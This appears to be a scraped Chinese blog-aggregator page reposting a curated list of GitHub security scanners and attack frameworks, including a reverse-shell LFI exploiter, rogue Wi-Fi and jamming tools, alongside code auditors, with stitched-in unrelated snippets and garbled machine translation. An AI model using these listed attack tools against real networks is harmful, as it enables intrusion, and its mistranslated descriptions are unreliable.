    · https://github.com/OsandaMalith/LFiFreak(一个独特的自动LFI开发器,带有BIND/反向shell)

    · https://github.com/mak-/parameth(这个工具可以用来野蛮地发现GET和POST参数)

    · https://github.com/Lucifer1993/struts-scan(Struts 2外阴扫描仪,支持所有的外阴)

    · https://github.com/hahwul/a2sv(自动扫描SSL漏洞,如心脏出血等)

    · https://github.com/NullArray/DorkNet(Selenium支持Python脚本,用于自动搜索易受攻击的Web应用程序)

    · https://github.com/NickstaDB/BaRMIe(java rmi枚举和攻击工具)

    · https://github.com/RetireJS/grunt-retire(扫描器检测使用具有已知漏洞的JavaScript库)

    · https://github.com/kotobukki/BDA(Hadoop和SPark的漏洞检测器)

    · https://github.com/jagracey/Regex-DoS(RegEx拒绝服务扫描器)

    · https://github.com/milesrichardson/docker-onion-nmap(使用Tor、ProxyChains和dnsmasq用nmap扫描洋葱隐藏服务)

    · https://github.com/Moham3dRiahi/XAttacker(WebCMS利用框架)

    · https://github.com/lijiejie/BBScan(一个小型批处理Web漏洞扫描器)

    · https://github.com/almandin/fuxploider(文件上传漏洞扫描器和利用工具)

    无线网络扫描器

    · https://github.com/savio-code/fern-wifi-cracker/(测试和发现自己网络中的缺陷)

    · https://github.com/m4n3dw0lf/PytheM(多用途网络五层框架)

    · https://github.com/P0cL4bs/WiFi-Pumpkin(盗用Wi-Fi接入点攻击框架)

    · https://github.com/MisterBianco/BoopSuite(用Python编写的用于无线审计和安全测试的工具套件)

    · https://github.com/DanMcInerney/LANs.py(自动找到最活跃的WLAN用户,注入代码,阻塞wifi,并监视wifi用户)

    · https://github.com/besimaltnok/PiFinger(搜索wifi-菠萝痕迹并计算无线网络安全分数)

    · https://github.com/derv82/wifite2(自动无线攻击工具的完整重新编写)

    局域网(局域网)扫描器

    · https://github.com/sowish/LNScan(基于BBScan via.lijieje的本地网络扫描仪)

    · https://github.com/niloofarkheirkhah/nili(网络扫描工具,中间人,协议逆向工程和模糊)

    · https://github.com/SkyLined/LocalNetworkScanner(当您打开网页时扫描本地网络的poc javascript)

    · https://github.com/rootlabs/nWatch(局域网中主机发现、端口扫描和操作系统指纹识别工具)

    代码检查工具或扫描器

    · https://github.com/wufeifei/cobra(一个自动代码分析系统,用于自动检测漏洞和安全问题)

    · https://github.com/OneSourceCat/phpvulhunter(可以使用静态分析方法自动扫描php漏洞的工具)

    · https://github.com/Qihoo360/phptrace(用于php脚本的跟踪和故障排除工具)

    · https://github.com/ajinabraham/NodeJsScan(用于电子邮件应用程序的静态安全代码扫描器)

    · https://github.com/shengqi158/pyvulhunter(用于python应用程序的静态安全代码扫描器)

    · https://github.com/presidentbeef/brakeman(用于RubyonRails应用程序的静态分析安全漏洞扫描器)

    · https://github.com/python-security/pyt(用于检测PythonWeb应用程序中的安全漏洞的静态分析工具)

    · https://github.com/m4ll0k/WPSploit(WordPress插件代码审核)

    · https://github.com/emanuil/php-reaper(用于扫描ADOdb代码以进行SQL注入的PHP工具)

    · https://github.com/lowjoel/phortress(PHP静态代码分析器,用来分析潜在的漏洞)

    模块化设计扫描仪或漏洞检测框架

    · https://github.com/infobyte/faraday(协作渗透测试和漏洞管理平台)

    · https://github.com/az0ne/AZScanner(自动全方位扫描仪)

    · https://github.com/blackye/lalascan(分布式Web漏洞扫描框架)

    · https://github.com/blackye/BkScanner(分布式、插件web漏洞扫描器)

    · https://github.com/ysrc/GourdScanV2(被动漏洞扫描系统)

    · https://github.com/netxfly/passive_scan基于http代理的web漏洞扫描系统实现

    · https://github.com/1N3/Sn1per(自动五旬节侦察扫描仪)

    · https://github.com/RASSec/pentestEr_Fully-automatic-scanner(定向完全自动渗透测试)

    · https://github.com/3xp10it/3xp10it(自动渗透测试框架)

    · https://github.com/Lcys/lcyscan(一个插件扫描器,插件支持)

    · https://github.com/Xyntax/POC-T(穿透测试插件并发框架)

    · https://github.com/v3n0m-Scanner/V3n0M-Scanner(用于SQLi/xss/LFI/rfi和其他Vulns的扫描程序中的扫描器)

    · https://github.com/Skycrab/leakScan(多个外阴扫描支持Web接口)

    · https://github.com/zhangzhenfeng/AnyScan(自动渗透测试框架)

    · https://github.com/Tuhinshubhra/RED_HAWK(一个用于收集信息、SQL漏洞扫描和爬行的全部集成工具。(用PHP编码)

    · https://github.com/Arachni/arachni(Web应用程序安全扫描框架)

    · https://github.com/boy-hack/w8scan(类似于Bugscan的扫描仪)

    · https://github.com/juansacco/exploitpack(利用Pack-渗透测试框架GPLv 3)

    · https://github.com/swisskyrepo/DamnWebScanner(另一个Web漏洞扫描器,此扩展在Chrome和Opera上工作)

    · https://github.com/anilbaranyelken/tulpar(用python编写的web漏洞扫描程序,支持多个web漏洞扫描)

    · https://github.com/m4ll0k/Spaghetti(一个Web应用程序安全扫描工具,旨在查找各种默认和不安全的文件、配置和错误配置)

    · https://github.com/Yukinoshita47/Yuki-Chan-The-Auto-Pentest(一个自动渗透测试工具-该工具将为您审核所有标准的安全测试方法)

    · https://github.com/0xsauby/yasuo(在网络上扫描易受攻击和可利用的第三方web应用程序的Ruby脚本)

    · https://github.com/hatRiot/clusterd(应用服务器攻击工具包)

    · https://github.com/erevus-cn/pocscan(开放源码和分布式web漏洞扫描框架)

    · https://github.com/TophantTechnology/osprey(分布式Web漏洞扫描框架)

    · https://github.com/yangbh/Hammer(web漏洞扫描器框架)

    · https://github.com/Lucifer1993/AngelSword(基于上的web漏洞扫描框架)

    · https://github.com/secrary/EllaScanner(被动Web扫描程序,您可以获得与服务器版本相关的CVEs)

    · https://github.com/zaproxy/zaproxy(世界上最受欢迎的免费安全工具之一,由数百名国际志愿人员积极维护)

    · https://github.com/sullo/nikto(nikto是一个web服务器评估工具)。它旨在查找各种默认的和不安全的文件、配置和程序,无论是哪种web服务器都是这样的。

    · https://github.com/UltimateHackers/Striker(前锋是一种攻击性信息和漏洞扫描器)

    · https://github.com/dermotblair/webvulscan(用php编写并可以用于测试远程或本地web应用程序以获得安全漏洞)

    · https://github.com/alienwithin/OWASP-mth3l3m3nt-framework(渗透测试辅助工具和开发框架)

    · https://github.com/toyakula/luna(基于减少代码被动扫描框架的开源web安全扫描器)

    · https://github.com/Manisso/fsociety(渗透测试框架,包括信息收集、无线测试、网络黑客等)

    一些工具与APT有关。

    · https://github.com/Neo23x0/Loki(简单国际奥委会和事件反应扫描仪)

    一些工具与ICS相关。

    · https://github.com/w3h/icsmaster/tree/master/nse(数字债券的ICS枚举工具)


    转自:07v8

    展开全文
  • Scanners-Box是来自github平台的开源扫描仪的集合,包括子域枚举,数据库漏洞扫描程序,弱密码或信息泄漏扫描仪,端口扫描仪,指纹扫描仪和其他大型扫描仪,模块化扫描仪等。对于其他众所周知的扫描工具,如:Nmap,...

    项目介绍

    Scanners-Box是来自github平台的开源扫描仪的集合,包括子域枚举,数据库漏洞扫描程序,弱密码或信息泄漏扫描仪,端口扫描仪,指纹扫描仪和其他大型扫描仪,模块化扫描仪等。对于其他众所周知的扫描工具,如:Nmap,w3af,brakeman将不会包含在收集范围内。

    安全行业从业人员常用工具指引,包括各类在线安全学习资料和安全检测工具,欢迎大家持续贡献!

    入门指南

    fuzz工具收集

    子域名枚举

    web应用扫描器

    数据库扫描、注入工具

    弱口令或信息泄漏扫描

    物联网设备扫描

    XSS扫描

    企业网络自检

    webshell检测以及病毒分析工具

    内网安全渗透测试工具集

    端口扫描、指纹识别以及中间件扫描

    针对性漏洞测试工具

    无线网络渗透、扫描

    代码静态扫描、代码运行栈跟踪

    模块化扫描、综合扫描器

    Android系列工具:

    DDOS防护:

    https://github.com/ywjt/Dshield

    Database firewall:

    waf开源及规则:

    收集目的

    本工具包收集的初衷是向各类行业安全从业人员提供在企业信息安全防护体系建设过程中可以参考的各种开源或非开源安全扫描工具,以帮助安全从业人员对自身业务进行自检,从而提高安全性。

    展开全文
  • Scanners-Box是来自github平台的开源扫描仪的集合,包括子域枚举,数据库漏洞扫描程序,弱密码或信息泄漏扫描仪,端口扫描仪,指纹扫描仪和其他大型扫描仪,模块化扫描仪等。对于其他众所周知的扫描工具,如:Nmap,...

    项目介绍

    Scanners-Box是来自github平台的开源扫描仪的集合,包括子域枚举,数据库漏洞扫描程序,弱密码或信息泄漏扫描仪,端口扫描仪,指纹扫描仪和其他大型扫描仪,模块化扫描仪等。对于其他众所周知的扫描工具,如:Nmap,w3af,brakeman将不会包含在收集范围内。

    安全行业从业人员常用工具指引,包括各类在线安全学习资料和安全检测工具,欢迎大家持续贡献!

    入门指南

    fuzz工具收集

    子域名枚举

    web应用扫描器

    数据库扫描、注入工具

    弱口令或信息泄漏扫描

    物联网设备扫描

    XSS扫描

    企业网络自检

    webshell检测以及病毒分析工具

    内网安全渗透测试工具集

    端口扫描、指纹识别以及中间件扫描

    针对性漏洞测试工具

    无线网络渗透、扫描

    代码静态扫描、代码运行栈跟踪

    模块化扫描、综合扫描器

    Android系列工具:

    DDOS防护:

     

    Database firewall:

    waf开源及规则:

    展开全文
  • 那究竟是什么原因导致的呢,很明显,你的端口被占用了,那下面给出终极解决方案:   一、首先描述症状,如下图   二、出现问题了,首先确定你的sdk目录是不是真的在Console输出的那个位置,如果是的话。接...
  • 如题,USB接口的二维码扫描仪,类似一个键盘的输入设备,它获取到的数据会直接输出到光标位置,如何去监听它并得到扫描到的数据?求大神指导,谢谢!
  • 当你在外面需要检查网络问题的时候,你会很庆幸有这样方便的移动扫描器。 事情来了……特别是在你还没有准备好的时候。你的网络突然出现问题,而你却在校园的另一端--你手上唯一的工具就是你的安卓设备。你必须要...
  • 常用端口对照端口:0服务:Reserved说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0...
  • 好久没写了,这片文章篇幅不长,概述一下在xamarin android中用 ZXing.Net.Mobile库扫描二维码读取url的示例。扫码支付,扫码登录,App上各种各样的扫码,好像没个扫码的就有点low一样似的,主要就是利用这个原理...
  • 查看本机端口是否开启: lsof -i :端口号 1、telnet[root@localhost ~]# telnet 172.25.254.62 80 Trying 172.25.254.62... Connected to 172.25.254.62. ##出现词句表示80端口已开启 Escape character is '^]'. ...
  • 对目标计算机进行端口扫描,能得到许多有用的信息。进行扫描的方法很多,可以是手工进行扫描,也可以用端口扫描软件进行。 在手工进行扫描时,需要熟悉各种命令。对命令执行后的输出进行分析。用扫描软件进行...
  • 很多时候,我们需要测试tcp端口,ping命令虽然好用,但不能测试端口 (ping基于ICMP协议,属于IP层协议,所以无法测试传输层的TCP/UDP端口)。幸好有tcping命令,可是tcping命令用法网上讲十分简略,一个如此实用的...
  • Android客户端的实现思路大致如下: 1、首先扫描局域网内所有PC,看是否有PC端的服务器在运行并监听30000端口。 2、如果没有扫描到有PC端的服务器在运行并监听30000端口,则重新扫描或者退出。 3、扫描到了有...
  • 如何查询ip地址和端口号:开始菜单--运行--输入command--MS-DOS出来后输入ipconfig/all,其中IP Address就是你的地址。netstat -an(查看端口命令)... 端口:25 服务:SMTP 说明:SMTP服务器所开放的端口,...
  • 详解Linux如何查看服务器开放的端口号 原创 波波说运维 2019-06-01 00:02:00 概述平时我们玩Linux的时候有时需要看下服务器是不是开放了一些端口号,然后看新的端口会不会冲突之类,讲查看服务器开放端口号之前,先...
  • 第一部分 Android网络基础  Android平台浏览器采用了WeBKit引擎,这款名为Chorme Lite的Web浏览器拥有强大扩展特性,每个开发者都以为编写自己的插件,使得浏览器的功能更加完善。  目前Android平台有3种网络...
  • 开源漏洞扫描器合集

    2018-06-14 17:02:29
    首先,谢谢原作者: (此文为转载的文章,现将原地址贴出如下:http://blog.csdn.net/mypc2010/article/details/77679760) ...redis awvs api nessus api====================================
1 2 3 4 5 ... 20
收藏数 4,150
精华内容 1,660